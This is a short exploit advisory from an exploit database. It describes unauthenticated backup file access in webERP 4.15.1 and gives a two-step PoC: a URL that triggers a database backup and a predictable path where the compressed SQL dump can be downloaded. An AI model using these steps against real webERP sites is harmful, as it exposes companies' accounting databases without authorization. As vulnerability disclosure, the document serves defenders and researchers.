Share
## https://sploitus.com/exploit?id=PACKETSTORM:157561
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access  
# Date: 2020-05-01  
# Author: Besim ALTINOK  
# Vendor Homepage: http://www.weberp.org  
# Software Link: https://sourceforge.net/projects/web-erp/  
# Version: v4.15.1  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
--------------------------------------------------------------------------  
About Software:  
  
webERP is a complete web-based accounting and business management system  
that requires only a web-browser and pdf reader to use. It has a wide range  
of features suitable for many businesses particularly distributed  
businesses in wholesale, distribution, and manufacturing.  
  
-------------------------------------------------------  
PoC Unauthenticated Backup File Access  
---------------------------------------------  
  
1- This file generates new Backup File:  
http://localhost/webERP/BackUpDatabase.php  
2- Someone can download the backup file from:  
--   
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz